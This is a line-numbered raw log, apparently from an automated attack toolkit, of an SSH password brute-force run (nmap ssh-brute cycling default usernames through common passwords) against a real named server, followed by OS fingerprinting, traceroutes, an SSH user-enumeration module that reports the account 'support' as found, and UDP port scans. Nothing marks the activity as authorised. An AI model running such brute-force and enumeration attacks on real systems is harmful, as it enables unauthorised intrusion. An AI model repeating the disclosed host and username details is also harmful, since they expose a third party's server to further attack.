  1651. NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
  1652. NSE: [ssh-brute] Trying username/password pair: guest:sunshine
  1653. NSE: [ssh-brute] Trying username/password pair: user:sunshine
  1654. NSE: [ssh-brute] Trying username/password pair: web:sunshine
  1655. NSE: [ssh-brute] Trying username/password pair: test:sunshine
  1656. NSE: [ssh-brute] Trying username/password pair: root:chocolate
  1657. NSE: [ssh-brute] Trying username/password pair: admin:chocolate
  1658. NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
  1659. NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
  1660. NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
  1661. NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
  1662. NSE: [ssh-brute] Trying username/password pair: guest:chocolate
  1663. NSE: [ssh-brute] Trying username/password pair: user:chocolate
  1664. NSE: [ssh-brute] Trying username/password pair: web:chocolate
  1665. NSE: [ssh-brute] Trying username/password pair: test:chocolate
  1666. NSE: [ssh-brute] Trying username/password pair: root:password1
  1667. NSE: [ssh-brute] Trying username/password pair: admin:password1
  1668. NSE: [ssh-brute] Trying username/password pair: administrator:password1
  1669. NSE: [ssh-brute] Trying username/password pair: webadmin:password1
  1670. NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
  1671. NSE: [ssh-brute] Trying username/password pair: netadmin:password1
  1672. NSE: [ssh-brute] Trying username/password pair: guest:password1
  1673. NSE: [ssh-brute] Trying username/password pair: user:password1
  1674. NSE: [ssh-brute] Trying username/password pair: web:password1
  1675. NSE: [ssh-brute] Trying username/password pair: test:password1
  1676. NSE: [ssh-brute] Trying username/password pair: root:soccer
  1677. NSE: [ssh-brute] Trying username/password pair: admin:soccer
  1678. NSE: [ssh-brute] Trying username/password pair: administrator:soccer
  1679. NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
  1680. NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
  1681. NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
  1682. NSE: [ssh-brute] Trying username/password pair: guest:soccer
  1683. NSE: [ssh-brute] Trying username/password pair: user:soccer
  1684. NSE: [ssh-brute] Trying username/password pair: web:soccer
  1685. NSE: [ssh-brute] Trying username/password pair: test:soccer
  1686. NSE: [ssh-brute] Trying username/password pair: root:anthony
  1687. NSE: [ssh-brute] Trying username/password pair: admin:anthony
  1688. NSE: [ssh-brute] Trying username/password pair: administrator:anthony
  1689. NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
  1690. NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
  1691. NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
  1692. NSE: [ssh-brute] Trying username/password pair: guest:anthony
  1693. NSE: [ssh-brute] Trying username/password pair: user:anthony
  1694. NSE: [ssh-brute] Trying username/password pair: web:anthony
  1695. NSE: [ssh-brute] Trying username/password pair: test:anthony
  1696. NSE: [ssh-brute] Trying username/password pair: root:friends
  1697. NSE: [ssh-brute] Trying username/password pair: admin:friends
  1698. NSE: [ssh-brute] Trying username/password pair: administrator:friends
  1699. NSE: [ssh-brute] Trying username/password pair: webadmin:friends
  1700. NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
  1701. NSE: [ssh-brute] Trying username/password pair: netadmin:friends
  1702. NSE: [ssh-brute] Trying username/password pair: guest:friends
  1703. NSE: [ssh-brute] Trying username/password pair: user:friends
  1704. NSE: [ssh-brute] Trying username/password pair: web:friends
  1705. NSE: [ssh-brute] Trying username/password pair: test:friends
  1706. NSE: [ssh-brute] Trying username/password pair: root:purple
  1707. NSE: [ssh-brute] Trying username/password pair: admin:purple
  1708. NSE: [ssh-brute] Trying username/password pair: administrator:purple
  1709. NSE: [ssh-brute] Trying username/password pair: webadmin:purple
  1710. NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
  1711. NSE: [ssh-brute] Trying username/password pair: netadmin:purple
  1712. NSE: [ssh-brute] Trying username/password pair: guest:purple
  1713. NSE: [ssh-brute] Trying username/password pair: user:purple
  1714. NSE: [ssh-brute] Trying username/password pair: web:purple
  1715. NSE: [ssh-brute] Trying username/password pair: test:purple
  1716. NSE: [ssh-brute] Trying username/password pair: root:angel
  1717. NSE: [ssh-brute] Trying username/password pair: admin:angel
  1718. NSE: [ssh-brute] Trying username/password pair: administrator:angel
  1719. NSE: [ssh-brute] Trying username/password pair: webadmin:angel
  1720. NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
  1721. NSE: [ssh-brute] Trying username/password pair: netadmin:angel
  1722. NSE: [ssh-brute] Trying username/password pair: guest:angel
  1723. NSE: [ssh-brute] Trying username/password pair: user:angel
  1724. NSE: [ssh-brute] Trying username/password pair: web:angel
  1725. NSE: [ssh-brute] Trying username/password pair: test:angel
  1726. NSE: [ssh-brute] Trying username/password pair: root:butterfly
  1727. NSE: [ssh-brute] Trying username/password pair: admin:butterfly
  1728. NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
  1729. NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
  1730. NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
  1731. NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
  1732. NSE: [ssh-brute] Trying username/password pair: guest:butterfly
  1733. NSE: [ssh-brute] Trying username/password pair: user:butterfly
  1734. NSE: [ssh-brute] Trying username/password pair: web:butterfly
  1735. NSE: [ssh-brute] Trying username/password pair: test:butterfly
  1736. NSE: [ssh-brute] Trying username/password pair: root:jordan
  1737. NSE: [ssh-brute] Trying username/password pair: admin:jordan
  1738. NSE: [ssh-brute] Trying username/password pair: administrator:jordan
  1739. NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
  1740. NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
  1741. NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
  1742. NSE: [ssh-brute] Trying username/password pair: guest:jordan
  1743. NSE: [ssh-brute] Trying username/password pair: user:jordan
  1744. NSE: [ssh-brute] Trying username/password pair: web:jordan
  1745. NSE: [ssh-brute] Trying username/password pair: test:jordan
  1746. NSE: [ssh-brute] Trying username/password pair: root:fuckyou
  1747. NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
  1748. NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
  1749. NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
  1750. NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
  1751. NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
  1752. NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
  1753. NSE: [ssh-brute] Trying username/password pair: user:fuckyou
  1754. NSE: [ssh-brute] Trying username/password pair: web:fuckyou
  1755. NSE: [ssh-brute] Trying username/password pair: test:fuckyou
  1756. NSE: [ssh-brute] Trying username/password pair: root:123123
  1757. NSE: [ssh-brute] Trying username/password pair: admin:123123
  1758. NSE: [ssh-brute] Trying username/password pair: administrator:123123
  1759. NSE: [ssh-brute] Trying username/password pair: webadmin:123123
  1760. NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
  1761. NSE: [ssh-brute] Trying username/password pair: netadmin:123123
  1762. NSE: [ssh-brute] Trying username/password pair: guest:123123
  1763. NSE: [ssh-brute] Trying username/password pair: user:123123
  1764. NSE: [ssh-brute] Trying username/password pair: web:123123
  1765. NSE: [ssh-brute] Trying username/password pair: test:123123
  1766. NSE: [ssh-brute] Trying username/password pair: root:justin
  1767. NSE: [ssh-brute] Trying username/password pair: admin:justin
  1768. NSE: [ssh-brute] Trying username/password pair: administrator:justin
  1769. NSE: [ssh-brute] Trying username/password pair: webadmin:justin
  1770. NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
  1771. NSE: [ssh-brute] Trying username/password pair: netadmin:justin
  1772. NSE: [ssh-brute] Trying username/password pair: guest:justin
  1773. NSE: [ssh-brute] Trying username/password pair: user:justin
  1774. NSE: [ssh-brute] Trying username/password pair: web:justin
  1775. NSE: [ssh-brute] Trying username/password pair: test:justin
  1776. NSE: [ssh-brute] Trying username/password pair: root:liverpool
  1777. NSE: [ssh-brute] Trying username/password pair: admin:liverpool
  1778. NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
  1779. NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
  1780. NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
  1781. NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
  1782. NSE: [ssh-brute] Trying username/password pair: guest:liverpool
  1783. NSE: [ssh-brute] Trying username/password pair: user:liverpool
  1784. NSE: [ssh-brute] Trying username/password pair: web:liverpool
  1785. NSE: [ssh-brute] Trying username/password pair: test:liverpool
  1786. NSE: [ssh-brute] Trying username/password pair: root:football
  1787. NSE: [ssh-brute] Trying username/password pair: admin:football
  1788. NSE: [ssh-brute] Trying username/password pair: administrator:football
  1789. NSE: [ssh-brute] Trying username/password pair: webadmin:football
  1790. NSE: [ssh-brute] Trying username/password pair: sysadmin:football
  1791. NSE: [ssh-brute] Trying username/password pair: netadmin:football
  1792. NSE: [ssh-brute] Trying username/password pair: guest:football
  1793. NSE: [ssh-brute] Trying username/password pair: user:football
  1794. NSE: [ssh-brute] Trying username/password pair: web:football
  1795. NSE: [ssh-brute] Trying username/password pair: test:football
  1796. NSE: [ssh-brute] Trying username/password pair: root:loveme
  1797. NSE: [ssh-brute] Trying username/password pair: admin:loveme
  1798. NSE: [ssh-brute] Trying username/password pair: administrator:loveme
  1799. NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
  1800. NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
  1801. NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
  1802. NSE: [ssh-brute] Trying username/password pair: guest:loveme
  1803. NSE: [ssh-brute] Trying username/password pair: user:loveme
  1804. NSE: [ssh-brute] Trying username/password pair: web:loveme
  1805. NSE: [ssh-brute] Trying username/password pair: test:loveme
  1806. NSE: [ssh-brute] Trying username/password pair: root:secret
  1807. NSE: [ssh-brute] Trying username/password pair: admin:secret
  1808. NSE: [ssh-brute] Trying username/password pair: administrator:secret
  1809. NSE: [ssh-brute] Trying username/password pair: webadmin:secret
  1810. NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
  1811. NSE: [ssh-brute] Trying username/password pair: netadmin:secret
  1812. NSE: [ssh-brute] Trying username/password pair: guest:secret
  1813. NSE: [ssh-brute] Trying username/password pair: user:secret
  1814. NSE: [ssh-brute] Trying username/password pair: web:secret
  1815. NSE: [ssh-brute] Trying username/password pair: test:secret
  1816. NSE: [ssh-brute] Trying username/password pair: root:andrea
  1817. NSE: [ssh-brute] Trying username/password pair: admin:andrea
  1818. NSE: [ssh-brute] Trying username/password pair: administrator:andrea
  1819. NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
  1820. NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
  1821. NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
  1822. NSE: [ssh-brute] Trying username/password pair: guest:andrea
  1823. NSE: [ssh-brute] Trying username/password pair: user:andrea
  1824. NSE: [ssh-brute] Trying username/password pair: web:andrea
  1825. NSE: [ssh-brute] Trying username/password pair: test:andrea
  1826. NSE: [ssh-brute] Trying username/password pair: root:jennifer
  1827. NSE: [ssh-brute] Trying username/password pair: admin:jennifer
  1828. NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
  1829. NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
  1830. NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
  1831. NSE: [ssh-brute] Trying username/password pair: netadmin:jennifer
  1832. NSE: [ssh-brute] Trying username/password pair: guest:jennifer
  1833. NSE: [ssh-brute] Trying username/password pair: user:jennifer
  1834. NSE: [ssh-brute] Trying username/password pair: web:jennifer
  1835. NSE: [ssh-brute] Trying username/password pair: test:jennifer
  1836. NSE: [ssh-brute] Trying username/password pair: root:joshua
  1837. NSE: [ssh-brute] Trying username/password pair: admin:joshua
  1838. NSE: [ssh-brute] Trying username/password pair: administrator:joshua
  1839. NSE: [ssh-brute] Trying username/password pair: webadmin:joshua
  1840. NSE: [ssh-brute] Trying username/password pair: sysadmin:joshua
  1841. NSE: [ssh-brute] Trying username/password pair: netadmin:joshua
  1842. NSE: [ssh-brute] Trying username/password pair: guest:joshua
  1843. NSE: [ssh-brute] Trying username/password pair: user:joshua
  1844. NSE: [ssh-brute] Trying username/password pair: web:joshua
  1845. NSE: [ssh-brute] Trying username/password pair: test:joshua
  1846. NSE: [ssh-brute] Trying username/password pair: root:carlos
  1847. NSE: [ssh-brute] Trying username/password pair: admin:carlos
  1848. NSE: [ssh-brute] Trying username/password pair: administrator:carlos
  1849. NSE: [ssh-brute] Trying username/password pair: webadmin:carlos
  1850. NSE: [ssh-brute] Trying username/password pair: sysadmin:carlos
  1851. NSE: [ssh-brute] Trying username/password pair: netadmin:carlos
  1852. NSE: [ssh-brute] Trying username/password pair: guest:carlos
  1853. NSE: [ssh-brute] Trying username/password pair: user:carlos
  1854. NSE: [ssh-brute] Trying username/password pair: web:carlos
  1855. NSE: [ssh-brute] Trying username/password pair: test:carlos
  1856. NSE: [ssh-brute] Trying username/password pair: root:superman
  1857. NSE: [ssh-brute] Trying username/password pair: admin:superman
  1858. NSE: [ssh-brute] Trying username/password pair: administrator:superman
  1859. NSE: [ssh-brute] Trying username/password pair: webadmin:superman
  1860. NSE: [ssh-brute] Trying username/password pair: sysadmin:superman
  1861. NSE: [ssh-brute] Trying username/password pair: netadmin:superman
  1862. NSE: [ssh-brute] Trying username/password pair: guest:superman
  1863. NSE: [ssh-brute] Trying username/password pair: user:superman
  1864. NSE: [ssh-brute] Trying username/password pair: web:superman
  1865. NSE: [ssh-brute] Trying username/password pair: test:superman
  1866. NSE: [ssh-brute] Trying username/password pair: root:bubbles
  1867. NSE: [ssh-brute] Trying username/password pair: admin:bubbles
  1868. NSE: [ssh-brute] Trying username/password pair: administrator:bubbles
  1869. NSE: [ssh-brute] Trying username/password pair: webadmin:bubbles
  1870. NSE: [ssh-brute] Trying username/password pair: sysadmin:bubbles
  1871. NSE: [ssh-brute] Trying username/password pair: netadmin:bubbles
  1872. NSE: [ssh-brute] Trying username/password pair: guest:bubbles
  1873. NSE: [ssh-brute] Trying username/password pair: user:bubbles
  1874. NSE: [ssh-brute] Trying username/password pair: web:bubbles
  1875. NSE: [ssh-brute] Trying username/password pair: test:bubbles
  1876. NSE: [ssh-brute] Trying username/password pair: root:hannah
  1877. NSE: [ssh-brute] Trying username/password pair: admin:hannah
  1878. NSE: [ssh-brute] Trying username/password pair: administrator:hannah
  1879. NSE: [ssh-brute] Trying username/password pair: webadmin:hannah
  1880. NSE: [ssh-brute] Trying username/password pair: sysadmin:hannah
  1881. NSE: [ssh-brute] Trying username/password pair: netadmin:hannah
  1882. NSE: [ssh-brute] Trying username/password pair: guest:hannah
  1883. NSE: [ssh-brute] Trying username/password pair: user:hannah
  1884. NSE: [ssh-brute] Trying username/password pair: web:hannah
  1885. NSE: [ssh-brute] Trying username/password pair: test:hannah
  1886. NSE: [ssh-brute] Trying username/password pair: root:1234567890
  1887. NSE: [ssh-brute] Trying username/password pair: admin:1234567890
  1888. NSE: [ssh-brute] Trying username/password pair: administrator:1234567890
  1889. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567890
  1890. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567890
  1891. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567890
  1892. NSE: [ssh-brute] Trying username/password pair: guest:1234567890
  1893. NSE: [ssh-brute] Trying username/password pair: user:1234567890
  1894. NSE: [ssh-brute] Trying username/password pair: web:1234567890
  1895. NSE: [ssh-brute] Trying username/password pair: test:1234567890
  1896. NSE: [ssh-brute] Trying username/password pair: root:amanda
  1897. NSE: [ssh-brute] Trying username/password pair: admin:amanda
  1898. NSE: [ssh-brute] Trying username/password pair: administrator:amanda
  1899. NSE: [ssh-brute] Trying username/password pair: webadmin:amanda
  1900. NSE: [ssh-brute] Trying username/password pair: sysadmin:amanda
  1901. NSE: [ssh-brute] Trying username/password pair: netadmin:amanda
  1902. NSE: [ssh-brute] Trying username/password pair: guest:amanda
  1903. NSE: [ssh-brute] Trying username/password pair: user:amanda
  1904. NSE: [ssh-brute] Trying username/password pair: web:amanda
  1905. NSE: [ssh-brute] Trying username/password pair: test:amanda
  1906. NSE: [ssh-brute] Trying username/password pair: root:andrew
  1907. NSE: [ssh-brute] Trying username/password pair: admin:andrew
  1908. NSE: [ssh-brute] Trying username/password pair: administrator:andrew
  1909. NSE: [ssh-brute] Trying username/password pair: webadmin:andrew
  1910. NSE: [ssh-brute] Trying username/password pair: sysadmin:andrew
  1911. NSE: [ssh-brute] Trying username/password pair: netadmin:andrew
  1912. NSE: [ssh-brute] Trying username/password pair: guest:andrew
  1913. NSE: [ssh-brute] Trying username/password pair: user:andrew
  1914. NSE: [ssh-brute] Trying username/password pair: web:andrew
  1915. NSE: [ssh-brute] Trying username/password pair: test:andrew
  1916. NSE: [ssh-brute] Trying username/password pair: root:loveyou
  1917. NSE: [ssh-brute] Trying username/password pair: admin:loveyou
  1918. NSE: [ssh-brute] Trying username/password pair: administrator:loveyou
  1919. NSE: [ssh-brute] Trying username/password pair: webadmin:loveyou
  1920. NSE: [ssh-brute] Trying username/password pair: sysadmin:loveyou
  1921. NSE: [ssh-brute] Trying username/password pair: netadmin:loveyou
  1922. NSE: [ssh-brute] Trying username/password pair: guest:loveyou
  1923. NSE: [ssh-brute] Trying username/password pair: user:loveyou
  1924. NSE: [ssh-brute] Trying username/password pair: web:loveyou
  1925. NSE: [ssh-brute] Trying username/password pair: test:loveyou
  1926. NSE: [ssh-brute] Trying username/password pair: root:pretty
  1927. NSE: [ssh-brute] Trying username/password pair: admin:pretty
  1928. NSE: [ssh-brute] Trying username/password pair: administrator:pretty
  1929. NSE: [ssh-brute] Trying username/password pair: webadmin:pretty
  1930. NSE: [ssh-brute] Trying username/password pair: sysadmin:pretty
  1931. NSE: [ssh-brute] Trying username/password pair: netadmin:pretty
  1932. NSE: [ssh-brute] Trying username/password pair: guest:pretty
  1933. NSE: [ssh-brute] Trying username/password pair: user:pretty
  1934. NSE: [ssh-brute] Trying username/password pair: web:pretty
  1935. NSE: [ssh-brute] Trying username/password pair: test:pretty
  1936. NSE: [ssh-brute] Trying username/password pair: root:basketball
  1937. NSE: [ssh-brute] Trying username/password pair: admin:basketball
  1938. NSE: [ssh-brute] Trying username/password pair: administrator:basketball
  1939. NSE: [ssh-brute] Trying username/password pair: webadmin:basketball
  1940. NSE: [ssh-brute] Trying username/password pair: sysadmin:basketball
  1941. NSE: [ssh-brute] Trying username/password pair: netadmin:basketball
  1942. NSE: [ssh-brute] Trying username/password pair: guest:basketball
  1943. NSE: [ssh-brute] Trying username/password pair: user:basketball
  1944. NSE: [ssh-brute] Trying username/password pair: web:basketball
  1945. NSE: [ssh-brute] Trying username/password pair: test:basketball
  1946. NSE: [ssh-brute] Trying username/password pair: root:angels
  1947. NSE: [ssh-brute] Trying username/password pair: admin:angels
  1948. NSE: [ssh-brute] Trying username/password pair: administrator:angels
  1949. NSE: [ssh-brute] Trying username/password pair: webadmin:angels
  1950. NSE: [ssh-brute] Trying username/password pair: sysadmin:angels
  1951. NSE: [ssh-brute] Trying username/password pair: netadmin:angels
  1952. NSE: [ssh-brute] Trying username/password pair: guest:angels
  1953. Nmap scan report for linux260.unoeuro.com (93.191.156.145)
  1954. Host is up (0.13s latency).
  1955.  
  1956. PORT STATE SERVICE VERSION
  1957. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  1958. | ssh-auth-methods:
  1959. | Supported authentication methods:
  1960. | publickey
  1961. |_ password
  1962. | ssh-brute:
  1963. | Accounts: No valid accounts found
  1964. |_ Statistics: Performed 567 guesses in 182 seconds, average tps: 3.4
  1965. | ssh-hostkey:
  1966. | 1024 fa:d3:03:2f:db:82:8d:21:30:46:74:25:37:bb:fa:3e (DSA)
  1967. |_ 2048 e1:2a:51:40:6c:bd:91:34:21:28:ab:59:64:59:9b:4a (RSA)
  1968. | ssh-publickey-acceptance:
  1969. |_ Accepted Public Keys: No public keys accepted
  1970. |_ssh-run: Failed to specify credentials and command to run.
  1971. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1972. Device type: general purpose|storage-misc|firewall|VoIP phone
  1973. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
  1974. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
  1975. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 3.10 (91%), Linux 3.4 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.39 (89%), WatchGuard Fireware 11.8 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  1976. No exact OS matches for host (test conditions non-ideal).
  1977. Network Distance: 19 hops
  1978.  
  1979. TRACEROUTE (using port 22/tcp)
  1980. HOP RTT ADDRESS
  1981. 1 22.70 ms 10.246.200.1
  1982. 2 22.74 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
  1983. 3 33.16 ms 37.120.128.166
  1984. 4 22.74 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
  1985. 5 56.57 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
  1986. 6 120.27 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
  1987. 7 115.04 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
  1988. 8 114.42 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
  1989. 9 116.26 ms 80.231.131.157
  1990. 10 120.03 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
  1991. 11 114.45 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
  1992. 12 119.20 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
  1993. 13 114.44 ms 195.219.87.9
  1994. 14 113.26 ms 195.219.87.25
  1995. 15 129.85 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
  1996. 16 130.54 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
  1997. 17 131.10 ms 212.237.248.7
  1998. 18 ...
  1999. 19 130.82 ms linux260.unoeuro.com (93.191.156.145)
  2000. #######################################################################################################################################
  2001. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  2002. RHOSTS => 93.191.156.145
  2003. RHOST => 93.191.156.145
  2004. [*] 93.191.156.145:22 - SSH - Using malformed packet technique
  2005. [*] 93.191.156.145:22 - SSH - Starting scan
  2006. [-] 93.191.156.145:22 - SSH - User 'admin' not found
  2007. [-] 93.191.156.145:22 - SSH - User 'administrator' not found
  2008. [-] 93.191.156.145:22 - SSH - User 'anonymous' not found
  2009. [-] 93.191.156.145:22 - SSH - User 'backup' not found
  2010. [-] 93.191.156.145:22 - SSH - User 'bee' not found
  2011. [-] 93.191.156.145:22 - SSH - User 'ftp' not found
  2012. [-] 93.191.156.145:22 - SSH - User 'guest' not found
  2013. [-] 93.191.156.145:22 - SSH - User 'GUEST' not found
  2014. [-] 93.191.156.145:22 - SSH - User 'info' not found
  2015. [-] 93.191.156.145:22 - SSH - User 'mail' not found
  2016. [-] 93.191.156.145:22 - SSH - User 'mailadmin' not found
  2017. [-] 93.191.156.145:22 - SSH - User 'msfadmin' not found
  2018. [-] 93.191.156.145:22 - SSH - User 'mysql' not found
  2019. [-] 93.191.156.145:22 - SSH - User 'nobody' not found
  2020. [-] 93.191.156.145:22 - SSH - User 'oracle' not found
  2021. [-] 93.191.156.145:22 - SSH - User 'owaspbwa' not found
  2022. [-] 93.191.156.145:22 - SSH - User 'postfix' not found
  2023. [-] 93.191.156.145:22 - SSH - User 'postgres' not found
  2024. [-] 93.191.156.145:22 - SSH - User 'private' not found
  2025. [-] 93.191.156.145:22 - SSH - User 'proftpd' not found
  2026. [-] 93.191.156.145:22 - SSH - User 'public' not found
  2027. [-] 93.191.156.145:22 - SSH - User 'root' not found
  2028. [-] 93.191.156.145:22 - SSH - User 'superadmin' not found
  2029. [+] 93.191.156.145:22 - SSH - User 'support' found
  2030. [-] 93.191.156.145:22 - SSH - User 'sys' not found
  2031. [-] 93.191.156.145:22 - SSH - User 'system' not found
  2032. [-] 93.191.156.145:22 - SSH - User 'systemadmin' not found
  2033. [-] 93.191.156.145:22 - SSH - User 'systemadministrator' not found
  2034. [-] 93.191.156.145:22 - SSH - User 'test' not found
  2035. [-] 93.191.156.145:22 - SSH - User 'tomcat' not found
  2036. [-] 93.191.156.145:22 - SSH - User 'user' not found
  2037. [-] 93.191.156.145:22 - SSH - User 'webmaster' not found
  2038. [-] 93.191.156.145:22 - SSH - User 'www-data' not found
  2039. [-] 93.191.156.145:22 - SSH - User 'Fortimanager_Access' not found
  2040. [*] Scanned 1 of 1 hosts (100% complete)
  2041. [*] Auxiliary module execution completed
  2042. #######################################################################################################################################
  2043. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:54 EST
  2044. Nmap scan report for linux260.unoeuro.com (93.191.156.145)
  2045. Host is up (0.13s latency).
  2046.  
  2047. PORT STATE SERVICE VERSION
  2048. 67/udp open|filtered dhcps
  2049. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
  2050. Too many fingerprints match this host to give specific OS details
  2051. Network Distance: 18 hops
  2052.  
  2053. TRACEROUTE (using proto 1/icmp)
  2054. HOP RTT ADDRESS
  2055. 1 21.94 ms 10.246.200.1
  2056. 2 22.33 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
  2057. 3 37.74 ms 37.120.128.166
  2058. 4 21.98 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
  2059. 5 22.00 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
  2060. 6 113.58 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
  2061. 7 114.21 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
  2062. 8 113.61 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
  2063. 9 115.99 ms 80.231.131.157
  2064. 10 113.24 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
  2065. 11 115.89 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
  2066. 12 115.89 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
  2067. 13 114.87 ms 195.219.87.9
  2068. 14 114.84 ms 195.219.87.25
  2069. 15 130.36 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
  2070. 16 130.10 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
  2071. 17 130.05 ms 212.237.248.7
  2072. 18 129.69 ms linux260.unoeuro.com (93.191.156.145)
  2073. #######################################################################################################################################
  2074. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:56 EST
  2075. Nmap scan report for linux260.unoeuro.com (93.191.156.145)
  2076. Host is up (0.13s latency).
  2077.  
  2078. PORT STATE SERVICE VERSION
  2079. 68/udp open|filtered dhcpc
  2080. Too many fingerprints match this host to give specific OS details
  2081. Network Distance: 18 hops
  2082.  
  2083. TRACEROUTE (using proto 1/icmp)
  2084. HOP RTT ADDRESS
  2085. 1 23.46 ms 10.246.200.1
  2086. 2 23.90 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
  2087. 3 43.82 ms 37.120.128.166
  2088. 4 23.50 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
  2089. 5 43.28 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
  2090. 6 115.51 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
  2091. 7 116.10 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
  2092. 8 114.90 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
  2093. 9 114.90 ms 80.231.131.157
  2094. 10 115.55 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
  2095. 11 114.76 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
  2096. 12 114.71 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
  2097. 13 114.72 ms 195.219.87.9
  2098. 14 113.62 ms 195.219.87.25
  2099. 15 128.62 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
  2100. 16 129.56 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
  2101. 17 129.12 ms 212.237.248.7
  2102. 18 131.15 ms linux260.unoeuro.com (93.191.156.145)
  2103. ######################################################################################################################################
  2104. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:58 EST
  2105. Nmap scan report for linux260.unoeuro.com (93.191.156.145)
  2106. Host is up (0.13s latency).
  2107.  
  2108. PORT STATE SERVICE VERSION
  2109. 69/udp open|filtered tftp
  2110. Too many fingerprints match this host to give specific OS details
  2111. Network Distance: 18 hops
  2112.  
  2113. TRACEROUTE (using proto 1/icmp)
  2114. HOP RTT ADDRESS
  2115. 1 33.22 ms 10.246.200.1
